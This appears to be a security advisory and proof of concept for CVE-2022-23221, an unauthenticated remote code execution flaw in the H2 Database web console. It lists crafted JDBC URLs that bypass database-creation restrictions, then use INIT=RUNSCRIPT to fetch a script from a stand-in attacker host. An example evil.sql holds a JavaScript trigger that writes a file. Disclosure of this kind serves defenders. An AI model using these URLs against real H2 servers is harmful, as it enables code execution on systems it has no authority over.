Document Title =============== Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221. Product Description =============== The H2 Console Application The Console lets you access a SQL database using a browser interface. Homepage: Affected Components =============== File Name: File Path: /h2database/h2/src/main/org/h2/server/web/ Impacted Function: getConnection PoC =============== 1) Navigate to the console and attempt to connect to a H2 in memory database that does not exist using the following JDBC URL: ``` jdbc:h2:mem:1337; ``` 2) Note that you get the following security exception preventing you from creating a new in memory database: ``` Database "mem:1337" not found, either pre-create it or allow remote database creation (not recommended in secure environments) [90149-209] 90149/90149 (Help) ``` 3) Now try again with the following JDBC URL: ``` jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\ ``` 4) Note that you were able to successfully create a new in memory database 5) Create a SQL file that contains a trigger that executes java/javascript/ruby code when executed and host it on a domain you control (ex: http://attacker) 6) Use the following JDBC URL to execute the SQL file hosted on your domain on connect: ``` jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://attacker/evil.sql';'\ ``` Example evil.sql file: ``` CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript var fos = Java.type(""); var b = new fos ("/tmp/pwnedlolol");'; INSERT INTO TEST VALUES (1); ``` CVE Issued: CVE-2022-23221